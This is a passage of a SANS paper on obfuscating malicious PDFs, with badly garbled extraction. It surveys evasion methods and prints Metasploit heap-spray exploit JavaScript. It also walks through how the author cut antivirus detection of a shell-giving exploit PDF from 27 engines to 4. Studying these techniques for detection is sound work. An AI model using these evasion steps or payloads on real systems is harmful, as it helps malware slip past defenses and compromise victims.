+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[
+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]
]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]
+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[
!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]
+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[]
)[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
]([!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()”
Source:!(JSF*ck)
2.4. PDF Filters
PDF files,!and!the!javascript!they!often!contain,!use!a!variety!of!obfuscation!
techniques!to!avoid!detection.!!On!April!22nd
,!2011,!researchers!at!Avast!,!a!Czech!
security!vendor,!detected!a!!new!technique!for!obfuscation!using!filters!supported!
by!the!format.!!“The!filter,!JBIG2Decode,!is!normally!used!to!decode!monochrome!
image!data!but!in!this!case!the!attackers!used!it!to!store!javascript!code”!(Avast!).!!
Refer!to!the!PDF!specification!documents!(found!here:!
http://www.adobe.com/devnet/pdf/pdf_reference.html)!to!see!the!only!filters!
intended!for!stream!encoding/decoding!are!ASCIIHexDecode,!ASCII85Decode,!
LZWDecode,!FlateDecode,!RunLenghDecode,!CCITTFaxDecode,!and!DCTDecode.!!
Contrast!that!list!with!the!complete!list!of!encoders!available!and!you!will!find!three!
not!included;!JBIG2Decode,!JPXDecode,!Crypt.!!Could!JPXDecode!also!be!used!to!
obfuscate!malicious!code?!!These!are!the!questions!to!ask!ourselves!that!lead!us!to!
solving!detection!problems!in!creative!ways.©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 17
Author!Name,!email@address
There!are!several!filters!available!to!encode!streams!as!noted!within!the!
Adobe!PDF!specification.!!These!are!shown!below:
(Source:!
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/
pdf/pdfs/adobe_supplement_iso32000.pdf)
These!filters!provide!built!in!obfuscation!functionality.!!While!this!is!handy!
when!a!data!file!is!transmitted!over!a!medium!that!requires!such!encoding!or!to!
simply!make!the!file!smaller,!it!is!also!taken!advantage!of!by!malware!authors.!“By!
combining the!filters!in!weird!ways!the!malware!author!hopes!to!bypass!detection!
by!malware!scanners!and!deliver!a!malicious!payload!to!the!victim.”!(Sophos)
For!example,!CCITTFaxDecode has!been!spotted!in!the!wild!being!used!for!
obfuscation (Sophos).!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 18
Author!Name,!email@address
Source:!(Sophos)
The!analyst!at!Sophos!decodes!the!first!few!bytes!of!the!file!and!discovers!that!
the!file!is!attempting!to!exploit!the!vulnerability!CVEO2010O2883.!!
2.5. Eval() Function
Within!javascript,!“the!eval() function!evaluates!or!executes!an!argument.!!If!the!
argument!is!an!expression,!eval()!evaluates!the!expression.!If!the!argument!is!one!or!
more!JavaScript!statements,!eval()!executes!the!statements.”!(w3schools)
For!the!purpose!of!malicious!obfuscation,!the!eval!function!can!mask!our!code!
within!an!equivalent!expression.!!It!is!common!for!antivirus!vendors!to!consider!
strings!common!to!malicious!code!when!evaluating!code.!!For!example,!some!
antivirus!products!are!known!to!trigger!on!the!unescape!function.!!!!To!prevent!this!
using!eval(),!one!could!replace “unescape”!with!eval(‘un’!+!‘es’!+!‘ca’!+!‘pe’)!or!
javascript!with!eval(‘jav’!+!‘a’!+!‘scr’!+!‘ipt’).!!
2.6. Escape/unescape Function
Escape/unescape!is!a!programmatic!function!used!to!convert!a!string!into!a!
standard!format!to!allow!for!easier!transmission!across!various!mediums!and/or!
protocol.!!Some!methods!of!data!transmission!handle!various!characters!in!different!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 19
Author!Name,!email@address
ways.!!The!best!way!to!avoid!the!misinterpretation!of!a!string!is!to!convert!it!
(escape)!into!a!common!format!which!can!then!be!converted!back!(unescaped)!by!
the!recipient.!!
Consider!the!following!example:
The!string,!“drop!bobby!tables;!His!attendance!is!no!longer!desired!OO Momma!
tables”!could!be!escaped!like!this:
drop%20bobby%20tables%3B%20His%20attendance%20is%20no%20longer%20de
sired%20^^%20Momma%20tables
or:
%64%72%6f%70%20%62%6f%62%62%79%20%74%61%62%6c%65%73%3b%20
%48%69%73%20%61%74%74%65%6e%64%61%6e%63%65%20%69%73%20%6
e%6f%20%6c%6f%6e%67%65%72%20%64%65%73%69%72%65%64%20%2d%2
d%20%4d%6f%6d%6d%61%20%74%61%62%6c%65%73
or:
%u0064%u0072%u006F%u0070%u0020%u0062%u006F%u0062%u0062%u0079%
u0020%u0074%u0061%u0062%u006C%u0065%u0073%u003B%u0020%u0048%u
0069%u0073%u0020%u0061%u0074%u0074%u0065%u006E%u0064%u0061%u0
06E%u0063%u0065%u0020%u0069%u0073%u0020%u006E%u006F%u0020%u00
6C%u006F%u006E%u0067%u0065%u0072%u0020%u0064%u0065%u0073%u006
9%u0072%u0065%u0064%u0020%u002D%u002D%u0020%u004D%u006F%u006
D%u006D%u0061%u0020%u0074%u0061%u0062%u006C%u0065%u0073
All!of!which!can!be!unescaped!to!achieve!the!original!string.!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 20
Author!Name,!email@address
(Source:!Author!created)
2.7. Malformed Syntax
Malformed!obfuscation!techniques!are!those!that!alter!the!formatting!of!a!file!so!
that!it!does!not!follow!the!official!specifications!yet!still!opens!within!the!user!
environment.!!Adobe!Reader,!in!particular,!“tries!to!load!malformed!PDF!files”!
(Porst) even!though!there!may!be!malformed!sections!of!the!file.
For!example,!the!PDF!specifications!require!that!PDF!documents!begin!with!a!
PDF!header.!!A!sample!PDF!header!looks!like!this:
%PDFO1.5
Though!this!is!exact!format!is!not!required.!!The!only!requirements!are!that!
“the!header!must!appear!in!the!first!1024!bytes.!!It!must!appear!before!the!Catalog!
object.!!Only!“%PDFO“!is!necessary!if!the!rest!is!well!formed.!!Random!garbage!is!
ignored.”!(Wolf).!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 21
Author!Name,!email@address
This!allows!for!a!tremendous!amount!of!flexibility!for!malware!authors!to!alter!a!
file!in!unexpected!ways!to!avoid!antivirus!detection.
2.8. Encryption
Encryption,!of!course,!is!the!process!of!applying!a!cryptographic!algorithm!to!
data.!!The!PDF!format!allows!encryption!of!streams!or!strings.!!It!supports!RC4 and!
AES!(40!to!256!bit).!!
An!example!of!an!encrypted!stream!within!a!PDF!is!shown!below:
It’s!easy!to!spot!encryption!within!PDFs!because!it!will!always!contain!the!
same!type!and!placement!of!characters.!!!Also,!anytime!encryption!is!in!use!you!will!
see!/Encrypt!somewhere!within!the!file.!!
Here!is!an!example:
2.9. XDP Format©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 22
Author!Name,!email@address
There!may!be!alternate!file!types!opened!by!the!exploitable!application!that!can!
be!utilized!to!confuse!the!AV!detection!mechanisms!and!avoid!detection.!!For!
example,!xdp,!an XMLObased!PDF!format,!is!one!such!file type!that!can!drastically!
change!the!number!of!antiOvirus!vendors!detecting!a!malicious!file.!!
In!February!of!2011,!Alexander!Klink!posted!on!his!blog!that!he!had!found!an!
alternate!method!of!representing!a!PDF!file.!!In!his!tests,!a!metasploitOgenerated!PDF!
uploaded!to!Virustotal!returned!a!13!out!of!43!match.!!!An!equivalent!XDP!file!
uploaded!to!Virustotal!returned!a!0!out!of!43!match.!!He!subsequently!submitted!a!
feature!request!in!Metasploit!which!resulted!in!pdf2cdp.rb!being!published!shortly!
thereafter.!!
XDP!files!are!nothing!more!than!an!XML!header,!the!Base64Oencoded!PDF,!and!
an!XML!footer.!!Below,!we!see!the!structure!of!a!XDP!file.!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 23
Author!Name,!email@address
(source:!author!created)©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 24
Author!Name,!email@address
2.10. Random Variable Naming
Random!naming!of!any!variable!string!(function,!variable,!sub,!etc.)!has!no!
impact!on!functionality.!!Instead,!this!simple!technique!is!used!to!make!manual!
deobfuscation!more!complex.
As!an!example,!we!will!examine!an!obfuscated!PDF!generated!by!metasploit.!!
The!first!view!is!the!original:!!
var jOyBxiruYKURcTaNecewpP = unescape("%u0241%u37e1");
                var 
PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE ="";
for 
(JkLobzZMyBRpyotTXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd=128;JkLobzZMyBRpyot
TXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd>=0;--
JkLobzZMyBRpyotTXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd) 
PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE += 
unescape("%u0497%u9648");
                CshUqGkgWjTHYjLxkRzgqWuIy = 
PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE + 
jOyBxiruYKURcTaNecewpP;
                hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot = 
unescape("%u0497%u9648");
                qPuNwGeOxRqyheKIJAAgUagvjJdYrZWkUofjidjqbRqwsHDvxXHqtbg = 20;
while 
(hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.length
eahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt) 
hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot+=hAyGKlXasZmWmVTWvEvkTjkwX
UyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot;
                HgmEAoYTPKRFNrAnLYefN = 
hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.substring(0, 
QKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt);
                NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx = 
hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.substring(0, 
hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.lengthQKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt);
                
while(NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx.length+QKHrnJQAYyBXeh
QPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt < 0x40000) 
NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx = 
NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx+NCeBXapaBKQIbLcnsrlGUBsX
grtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx+HgmEAoYTPKRFNrAnLYefN;
                
RIZpfOxrrYDGiUKOuUtdaSFBjQJBxIkaQZDzZvWSDYrVGrJuqUKwDGPDmLIaZEOtdUsWRMvcBViutxIYieMJZjeUttvOCv = 
new Array();
for (uAVXcNTAVIBlyHTuz=0;uAVXcNTAVIBlyHTuz<1450;uAVXcNTAVIBlyHTuz++) 
RIZpfOxrrYDGiUKOuUtdaSFBjQJBxIkaQZDzZvWSDYrVGrJuqUKwDGPDmLIaZEOtdUsWRMvcBViutxIYieMJZjeUttvOCv[u
AVXcNTAVIBlyHTuz] = NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx + 
CshUqGkgWjTHYjLxkRzgqWuIy;
                var BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG = 
unescape("%u0c0c%u0c0c");
while(BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG.length < 
0x4000) 
BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG+=BTOqMxFjtLLa
HeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG;©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 25
Author!Name,!email@address
Now look!at!the!same!script!with!simple!variable!names:
As!you!can!see,!the!second!example!is!much!easier!to!understand.!!
2.11. Environment / User Variables
This!technique!uses!local!variables!as!a!component!of!the!javascript.!!Doing!so!
allows!the!malware!author!to!govern!the!flow!of!execution!based!on!those!variables.!!
By!leveraging!this!data!the!script!could!target,!for!example,!a!specific!runtime!
version!or!only!decrypt!if!certain!values!are!present.!!
An!example!of!this!technique!could!use!the!UserAgent!string!within!a!browser!
as!the!key!to!deobfuscate!a!malicious!javascript.!!“This!technique!could!be!used!to!
prevent!some!analysis!tools!from!retrieving!the!actual!malicious!code.!!It!would!also!
require!additional!effort!on!the!part!of!security!researchers!working!to!reverse!
engineer!the!code.”!!(Kahu!Security)
                var A = unescape("%u0241%u37e1...");
var B ="";
for (F=128;F>=0;--F) 
PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE += 
unescape("%u0497%u9648");
                K = B + A;
C = unescape("%u0497%u9648");
qPuNwGeOxRqyheKIJAAgUagvjJdYrZWkUofjidjqbRqwsHDvxXHqtbg = 20;
while (C.length
G = C.substring(0, D);
E = C.substring(0, C.length-D);
                while(E.length+D < 0x40000) E = E+E+G;
H = new Array();
                for (I=0;I<1450;I++) H[I] = E + K;
                var J = unescape("%u0c0c%u0c0c");
while(J.length < 0x4000) J+=J;©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 26
Author!Name,!email@address
Source:!(Kahu!Security)
Another!example!of!this!can!be!seen!within!javascripts!that!use!the!app!
object.!!“That!object!is!created!by!Acrobat!Reader,!so!if!you!run!the!script!outside!
(for!example,!with!Spidermonkey!or!another!Javascipt!interpreter)!this!call!will!fail!
since!the!object!will!not!exist.”!!(SANS)!!This!technique!is!illustrated!in!the!image!
below.©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 27
Author!Name,!email@address
Source:!(SANs)
3. Practical Application of Obfuscation Methods
Lets!see!some!of!these!techniques!in!practice.!!To!begin,!Metasploit is!used to!
create!a!malicious!PDF!utilizing!the!adobe_utilprintf!exploit by!following the!
instructions!located!at!Metasploit!Unleashed (
security.com/metasploitOunleashed/Client_Side_Attacks).!!
This!file!triggers!27/42!hits when!scanned!with!VirusTotal.!!
(source:!author!created)©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 28
Author!Name,!email@address
Metasploit!applies!obfuscation!by!default.!!See!below:
(source:!author!created)
I!implement!the!following!obfuscation!techniques!to!lower!the!number!of!
antivirus!detections:
eval()!function
encryption
replace!method
malformed
xdp
environment!variables©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 29
Author!Name,!email@address
After!applying!these!techniques antivirus!is!much!less!effective!at!detection:
(source:!author!created)
The!4 detecting!AV!engines!are!AntiVir,!Avast,!GData, Kaspersky.!!
Let!us!examine!how!the!file!was!changed!using!the!above!techniques.©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 30
Author!Name,!email@address
(source:!author!created)
The!image!above!shows!the!PDF!file!after!modification.!To!begin,!note!the!
conditional!added!uses!the!app!object!to!request!the!viewerType.!!If!it!does!not!
return!“Reader”!the!variables!that!follow!will!not!be!declared.!!Next,!the!unescape!
function!was!removed!from!the!FqCieFYnJBSPYM!variable!assignment.!Removing!
the!string!“unescape”!is!often!an!easy!way!to!lower!antivirus!detection.!!To!prevent!
serial!analysis!from!continued!detection,!Unescape!was separated!into!separate!two!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 31
Author!Name,!email@address
letter!variables!along!with!the!number!1!and!nonOlinear!placement.!!Replace!was!
then!used!to!clean!up!the!string!as!it!was!put!into!variable!‘g’.
varAaA=A'u1n';
varAbA=A'e1s';
varAcA=A'pe1';
varAeA=A'1ca';
varAfA=AaA+AbA+AeA+Ac;
varAgA=Af.replace(/1/g,"");
To!break!up!the Unicode!string into!jibberish,!I both!split!it!into!two!parts!
and!replaced!all!instances!of!‘u’!with!‘fud’.
varAhAA=A
"%fudb148%fud861c%fudfed3%fudc7c6%fudd2c1%fudb4d4%fud8d27%fud19b8%fu
debf6%fudf831%fud737a%fud1d72%fud93b7%fud4049%fudf530%fud9bb9%fud463
4%fud912cA…;
varAiA=A
"%fud7549%fud974a%fudb3be%fudbba8%fud2847%fud7ffc%fud0573%fud424f%fu
db5b8%fudb299%fud043c%fud71…;
Next,!to!remove!‘fud’!to!return!to!a!usable!string,!I!performed!another!
replace!operation!and!then!put!the!string!back!together.
varAjA=Ah.replace(/fud/g,"u");
varAkA=Ai.replace(/fud/g,"u");
varAlA=AjA+Ak;
Finally,!because!‘unescape’!is!currently!a!static!variable and!not!a!function,!
we!need!to!use!the!eval!operation!to!call!it!as!a!function.!!To!do!that,!we!need!to!
concatenate!the!variables:
varAzA=AgA+A"('" +AlA+A"');";
and!then!eval() into!FqCieFYnJBSPYM
varAFqCieFYnJBSPYMA=Aeval(z);©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 32
Author!Name,!email@address
To!make!the!file!slightly!malformed,!I!changed!the!%PDFO1.5!header!to!%PDFO
8.31337
(source:!author!created)
and!removed!two!endstream!markers:
(source:!author!created)©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 33
Author!Name,!email@address
Lastly,!I!encrypt!the!file:
(source:!author!created)
And!then!convert!it!to!xdp:©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 34
Author!Name,!email@address
(source:!author!created)
The!resulting!file!still!works!to!provide!a!shell!on!my!target!system:
(source:!author!created)
But!is!not!detected!as!malicious!by!a!large!number!of!antivirus!vendors.!
4. Conclusion
We have explored a variety of methods to obfuscate malicious intent.  While each 
method offers value, combining them in creative ways provides an attacker additional 
options to circumvent detection.  An understanding of common obfuscation techniques 
provides a foundational understanding of techniques that allow greater flexibility 
regarding attack customization.   Also, from the defensive perspective, understanding the 
layers of obfuscation in use by attackers helps develop more successful mitigation 
strategies.  
“Be!extremely!subtle,!even!to!the!point!of!formlessness.!!Be!extremely!mysterious,!
even!to!the!point!of!soundlessness.!!Thereby!you!can!be!the!director!of!the!
opponent’s!fate.”
OOSun!tzu,!Art!of!War©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 35
Author!Name,!email@address
5. Appendix 
A
(Source:!)©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 36
Author!Name,!email@address
B
(Source:!)©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 37
Author!Name,!email@address
6. References
Avast!!(n.d.).!Retrieved!from!https://blog.avast.com/2011/04/22/anotherOnastyO
trickOinOmaliciousOpdf/
Internet!Engineering!Task!Force.!(n.d.).!RFCA3548.!Retrieved!from!
jeresig.!(n.d.).!Retrieved!from!
JSF*ck.!(n.d.).!Retrieved!from!
jsunpack.!(n.d.).!Retrieved!from!
dec/go?report=3834e056b7d8a6659cc5fb166e3e3b8d48
67c0d9
Kahu!Security.!(n.d.).!JSAObfuscationAUsingAUserAgentAString.!Retrieved!from!
http://www.kahusecurity.com/2012/jsOobfuscationOusingOuseragentOstring/
Microsoft.!(n.d.).!Retrieved!08!10,!2012,!from!microsoft.com:!
%28v=vs.94%29.aspx
Porst,!S.!(n.d.).!HowAtoAreallyAobfuscateAyourAPDFAmalware.!Retrieved!from!
http://storage.zynamics.com/files/blog/pdf_malware.pdf
SANS.!(n.d.).!JavaScriptAobfuscationAinAPDF:ASkyAisAtheAlimit.!Retrieved!from!
Sophos.!(n.d.).!PDFAmalwareAadoptsAanotherAobfuscationAtrickAinAattemptAtoAavoidA
detection.!Retrieved!from!http://nakedsecurity.sophos.com/2012/04/05/ccittfaxO
pdfOmalware/
Symantec.!(n.d.).!Retrieved!from!
Trend!Micro.!(n.d.).!Retrieved!from!
content/us/pdfs/securityOintelligence/whiteOpapers/wp_trendsOinOtargetedO
attacks.pdf
Trend!Micro.!(n.d.).!Retrieved!from!http://blog.trendmicro.com/pdfOexploitO
becomesOaOlittleOsophisticated/
w3schools.!(n.d.).!JavascriptAeval()AFunction.!Retrieved!from!
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 38
Author!Name,!email@address
Wikipedia.!(n.d.).!Retrieved!from!hexadecimal:!
Wikipedia.!(n.d.).!Retrieved!from!Base64:!
Wikipedia.!(n.d.).!ASCII.!Retrieved!from!
Wikipedia.!(n.d.).!BitwiseAOperation.!Retrieved!from!
Wikipedia.!(n.d.).!PositionalANotation.!Retrieved!from!
Wolf,!J.!(n.d.).!OMGAWTFAPDF.!Retrieved!from!Fireeye:!
http://blog.fireeye.com/files/27c3_julia_wolf_omgOwtfOpdf.pdfLast Updated: December 14th, 2012
Upcoming SANS Training
Click Here for a full list of all Upcoming SANS Events by Location
SANS Anaheim 2013 Anaheim, CAUS Jan 09, 2013 - Jan 14, 2013 Live Event
